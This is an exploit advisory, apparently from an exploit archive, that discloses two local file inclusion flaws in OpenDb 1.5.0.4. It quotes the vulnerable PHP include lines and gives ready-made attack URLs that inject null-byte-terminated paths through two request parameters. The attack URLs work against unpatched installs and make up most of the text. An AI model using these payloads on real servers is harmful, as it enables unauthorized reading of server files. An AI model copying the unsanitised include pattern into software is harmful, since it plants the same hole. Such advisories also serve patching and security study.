[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OpenDb 1.5.0.4 Multiple LFI Vulnerability
# Published : 2010-01-23
# Author : ViRuSMaN
# Previous Title : Joomla (JBDiary) BLIND SQL Injection Vulnerabilities
# Next Title : Joomla Component com_gameserver SQL Injection Vulnerability
==============================================================================
__ __ __ __ __ __
/ / / / / /
/ / _/ / / / / / _/ /
/ / _ / / / / / _ /
/_/ _ __/ /_/ _
==============================================================================
[?] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
[?] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================
[?] Script: [ OpenDb ]
[?] Language: [ PHP ]
[?] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
[?] Download: [ http://sourceforge.net/projects/opendb/files/ ]
[?] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[?] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[?] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
#~ [C:AppServwwwScriptsopendbincludebegin.inc.php]
#~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");
[?] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]
===[ Exploit 2 ]===
#~[C:AppServwwwScriptsopendbfunctionssite_plugin.php]
#~Line 126 : include_once("./site/".$site_plugin_classname.".class.php");
[?] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]
Author: ViRuSMaN <-
###########################################################################